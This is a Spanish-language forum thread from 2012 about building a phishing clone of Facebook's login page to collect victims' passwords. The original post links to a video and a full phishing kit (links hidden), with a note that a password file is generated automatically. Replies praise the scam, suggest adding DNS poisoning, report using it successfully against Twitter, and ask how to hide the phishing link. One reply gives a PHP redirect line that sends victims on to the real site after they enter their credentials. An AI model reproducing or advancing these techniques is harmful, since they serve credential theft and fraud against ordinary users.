Creando un scam - phishing

Iniciado por Federal, Octubre 28, 2012, 01:56:30 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 28, 2012, 01:56:30 AM Ultima modificación: Abril 03, 2013, 12:27:15 PM por Federal
Hola amigos , soy nuevo en este foro y me gustaria compartir un video que hize hace algunos dias . Es sobre como crear un fake de una website (en este caso facebook) :)



Por si el video no cargase les dejo el link : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno aqui les dejo el scam completo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
el pass.html se genera solo ;)
Saludos .

#!usr/bin/federal
Cuando la vida te presenta razones para llorar, demuéstrale que tienes mil y una razones para vivir y sonreir.

Te felicito por su phising falta un envenamiento a un dns y es un caza bobo para cualquiera. Realice el mismo trabajo pero con twitter y me dio resultado.

Si, buen video, lo que pasa es que una vez tienes el scam subido a un servidor, lo mas dificil es ocultar el link. Alguien tiene alguna manera de ocultarlo bien o que redireccione la pagina  ???

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si, buen video, lo que pasa es que una vez tienes el scam subido a un servidor, lo mas dificil es ocultar el link. Alguien tiene alguna manera de ocultarlo bien o que redireccione la pagina  ???
añadiendo al final del .php el código:
Código: php
header("Location: http://www.webderedireccion.com ");

En dónde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es l web a la que quieres que te redireccione, te redireccionara cuando le pulses al botón de loguearte ;)
Un Saludo!
The war is the only way (?)

Checando, creo que ya tengo este cod